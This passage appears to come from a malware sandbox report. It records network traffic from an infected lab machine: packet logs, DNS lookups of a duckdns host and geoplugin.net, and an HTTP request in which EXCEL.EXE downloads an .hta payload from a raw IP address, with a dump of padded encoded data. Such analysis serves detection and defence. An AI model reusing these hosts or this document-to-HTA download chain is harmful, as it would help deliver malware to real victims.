                                                                                                                                                                              Oct 14, 2024 11:06:25.803850889 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803862095 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803878069 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803878069 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803904057 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803914070 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803925037 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803936005 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803952932 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803957939 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803957939 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803972960 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803983927 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803993940 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803996086 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.804008007 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.804008961 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.804023027 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.804039001 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.804138899 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.807985067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.807998896 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808010101 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808022022 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808034897 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808051109 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808063030 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808063030 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808070898 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808079004 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808083057 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808094978 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808106899 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808116913 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808130026 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808150053 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808152914 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808152914 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808161974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808171988 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808248043 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808260918 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808278084 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808289051 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808291912 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808306932 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808319092 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808331013 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808339119 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808377028 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808794022 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808816910 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808826923 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808881044 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808892012 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808903933 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808917046 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808924913 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808924913 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809003115 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809015036 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809026957 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809041023 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809048891 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809048891 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809052944 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809066057 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809077978 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809089899 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809102058 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809108973 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809108973 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809135914 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809139967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809158087 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809169054 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809179068 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809195042 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809202909 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.899305105 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.899305105 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902127028 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902138948 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902157068 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902163029 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902163029 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902169943 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902182102 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902183056 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902205944 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902237892 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902249098 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902261019 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902277946 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902287006 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902304888 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902312994 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902317047 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902331114 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902334929 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902343988 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902365923 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.991677999 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991698980 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991710901 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991729975 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991739988 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.991739988 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.991800070 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991832972 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991844893 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991856098 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991863966 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.991877079 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.991931915 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991944075 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991955042 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991967916 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992017031 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992072105 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992084026 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992094994 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992115974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992126942 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992136955 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992150068 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992150068 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992151976 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992176056 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992187023 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992199898 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992207050 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992207050 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992212057 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992233038 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992233992 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992244959 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992255926 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992266893 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992278099 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992288113 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992288113 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992290974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992310047 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992356062 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992367983 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992379904 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992389917 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992400885 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992410898 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992410898 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992420912 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992436886 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992445946 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992458105 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992468119 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992486000 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992494106 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992506981 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992517948 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992527008 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992541075 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992541075 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992541075 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992665052 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992665052 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992686033 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992697001 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992707014 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992708921 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992719889 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992731094 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992733002 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992743969 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992754936 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992768049 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992778063 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992778063 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992810011 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992820978 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992831945 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992846012 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992846966 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992846966 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992865086 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992876053 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992886066 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992897034 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992908001 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992908955 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992908955 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992923975 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992929935 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992937088 CEST8049177192.3.220.40192.168.2.22
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Oct 14, 2024 11:06:12.647938013 CEST | 192.168.2.22 | 8.8.8.8 | d017 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 14, 2024 11:05:42.872838020 CEST | 192.168.2.22 | 8.8.8.8 | 0xa666 | Standard query (0) | jfm.com.co | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:05:44.738820076 CEST | 192.168.2.22 | 8.8.8.8 | 0xcf72 | Standard query (0) | jfm.com.co | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:03.208472967 CEST | 192.168.2.22 | 8.8.8.8 | 0x27a3 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:05.140263081 CEST | 192.168.2.22 | 8.8.8.8 | 0xe1f8 | Standard query (0) | jfm.com.co | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:11.541066885 CEST | 192.168.2.22 | 8.8.8.8 | 0x5aa8 | Standard query (0) | idabo.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:12.540038109 CEST | 192.168.2.22 | 8.8.8.8 | 0x5aa8 | Standard query (0) | idabo.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:14.049437046 CEST | 192.168.2.22 | 8.8.8.8 | 0x8af7 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:19.415242910 CEST | 192.168.2.22 | 8.8.8.8 | 0xd2e4 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 14, 2024 11:05:42.884692907 CEST | 8.8.8.8 | 192.168.2.22 | 0xa666 | No error (0) | jfm.com.co |  | 150.136.81.248 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:05:44.763202906 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf72 | No error (0) | jfm.com.co |  | 150.136.81.248 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:03.214960098 CEST | 8.8.8.8 | 192.168.2.22 | 0x27a3 | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:03.214960098 CEST | 8.8.8.8 | 192.168.2.22 | 0x27a3 | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:03.214960098 CEST | 8.8.8.8 | 192.168.2.22 | 0x27a3 | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:03.214960098 CEST | 8.8.8.8 | 192.168.2.22 | 0x27a3 | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:05.151715994 CEST | 8.8.8.8 | 192.168.2.22 | 0xe1f8 | No error (0) | jfm.com.co |  | 150.136.81.248 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:12.640465975 CEST | 8.8.8.8 | 192.168.2.22 | 0x5aa8 | No error (0) | idabo.duckdns.org |  | 135.148.195.248 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:12.647614956 CEST | 8.8.8.8 | 192.168.2.22 | 0x5aa8 | No error (0) | idabo.duckdns.org |  | 135.148.195.248 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:14.058613062 CEST | 8.8.8.8 | 192.168.2.22 | 0x8af7 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:19.421860933 CEST | 8.8.8.8 | 192.168.2.22 | 0xd2e4 | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:19.421860933 CEST | 8.8.8.8 | 192.168.2.22 | 0xd2e4 | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:19.421860933 CEST | 8.8.8.8 | 192.168.2.22 | 0xd2e4 | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 14, 2024 11:06:19.421860933 CEST | 8.8.8.8 | 192.168.2.22 | 0xd2e4 | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                              • jfm.com.co
                                                                                                                                                                              • raw.githubusercontent.com
                                                                                                                                                                              • 192.3.220.40
                                                                                                                                                                              • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49162 | 192.3.220.40 | 80 | 3184 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 11:05:43.592744112 CEST | 366 | OUT | GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                              Host: 192.3.220.40
                                                                                                                                                                              Connection: Keep-Alive
Oct 14, 2024 11:05:44.110711098 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:05:44 GMT
                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 05:15:53 GMT
                                                                                                                                                                              ETag: "28fda-62468ee52a080"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 167898
                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/hta
                                                                                                                                                                              Oct 14, 2024 11:05:44.110927105 CEST1236INData Raw: 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35
                                                                                                                                                                              Data Ascii: 5252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2
                                                                                                                                                                              Oct 14, 2024 11:05:44.110960960 CEST896INData Raw: 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32
                                                                                                                                                                              Data Ascii: 2509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525252C%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525
                                                                                                                                                                              Oct 14, 2024 11:05:44.110996962 CEST1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32
                                                                                                                                                                              Data Ascii: 25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%
                                                                                                                                                                              Oct 14, 2024 11:05:44.111031055 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                                              Data Ascii: 52509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
                                                                                                                                                                              Oct 14, 2024 11:05:44.111068964 CEST1236INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                                                                                                                              Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
